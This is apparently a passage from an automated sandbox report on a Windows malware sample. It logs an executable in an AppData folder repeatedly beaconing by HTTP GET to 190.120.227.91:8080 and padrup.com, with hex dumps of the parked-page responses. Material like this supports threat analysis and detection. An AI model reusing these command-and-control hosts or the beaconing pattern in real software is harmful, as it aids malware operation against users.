                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705684900 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE2Mi4zNTMzOjEzOThmMGYyYmVlN2FkZTU1MTA1ZTRhZTczMWU5NDJjYjc4Y2M5ZWEzZGI5MWM5YzA4NjU5ZDc3ZTNkOGI3OWI6NjcxMjNiYTI1NjQyNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705697060 CEST757INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          23192.168.2.949741190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.483916998 CEST169OUTGET /sobakavolos.gif?10d62ae4=564942280 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          24192.168.2.949759185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.519427061 CEST158OUTGET /sobaka1.gif?115dbf54=-1381402296 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865255117 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:49 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_LYAs2Qg1fmeRPNkZ/oEjhQdi99lI78Lh+mmOA1Z/nX3pTCzPoX2jWa5M8CohKOuXjYfXi0g+g0C3hnx+nBhbTg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866540909 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE2OS4zMTY0OjMyYjM3OGExYTcxNWIyNWU0MDBjMzFjYmIzNzU1Y2RkYzVhYTk1MTBjYTgzY2ZkNzYyY2M0ZGE0ZjYwM2VkZDA6NjcxMjNiYTk0ZDNmZQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866552114 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.896806955 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          25192.168.2.949767190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.191215992 CEST169OUTGET /sobakavolos.gif?1176f212=293007890 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          26192.168.2.949784185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.940896988 CEST158OUTGET /sobaka1.gif?11fef99e=-1275740116 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.007972002 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:55 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_dZ+v4ctXFmBQxx0fm3kSaY6uCWtZJNpDBGF9dIRMwPCrVqUZmWedj2RDJVL0QJE8mpDXaTT7y3m5e3URTbCPtQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008053064 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE3NS42NjcyOjQyZTM1MTJjNzdlYmM1YjBiMzQxYzgwNDQ2NDA4ZDA3ODA1MjhmY2ZjOTM3YTIwMDBkOWMyNjI3OTIwNTNmOTM6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008063078 CEST1236INData Raw: 78 4d 6a 4e 69 59 57 5a 68 4d 6d 55 7a 4d 77 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiYWZhMmUzMw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008069038 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 61 66 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123baf&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'f299b2a5c4f1f0c5e79b41bed38c12b9e146b91d080');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          27192.168.2.949789190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.347258091 CEST171OUTGET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          28192.168.2.949806185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.612019062 CEST158OUTGET /sobaka1.gif?12ba214d=-2095650533 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755256891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:01 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FGPkNgzuMlVV0WjFxTmUVgbDr6/1tb0/q6HFTnEeTW3o9b2vPClHKxFOPS+T5VPTLGoAItP2hRuh6AaSLPtNcQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755389929 CEST212INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE4MS40MTM2OjFmZWJlMzc1ZTI3OWEzNDZkNmM3YjExNWJjY2RhNmE5Y2FkYzY4YmQxYTUwOTVkYmJmZTcwOTRmYzN
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755400896 CEST1236INData Raw: 6c 59 6a 45 78 4f 44 63 36 4e 6a 63 78 4d 6a 4e 69 59 6a 55 32 4e 47 5a 68 4d 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72
                                                                                                                                                                                                                                                                                          Data Ascii: lYjExODc6NjcxMjNiYjU2NGZhMg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755737066 CEST545INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bb5&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '61f0d492f43a2d0fb5a231619d68ec6c20851280');</script><script t


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          29192.168.2.949814190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.812066078 CEST169OUTGET /sobakavolos.gif?12d42dc2=947685702 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          30192.168.2.949835185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.057049990 CEST158OUTGET /sobaka1.gif?13de3bbe=-1294984786 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131195068 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:07 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_YlHPAEDLjHgH/k1drjXlD7FkUTytL5GSlTdUlK0r8tS7xBT9CzAcy7yEiiHmFlCsUgd1jP4461vCVpL9EYg7jg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
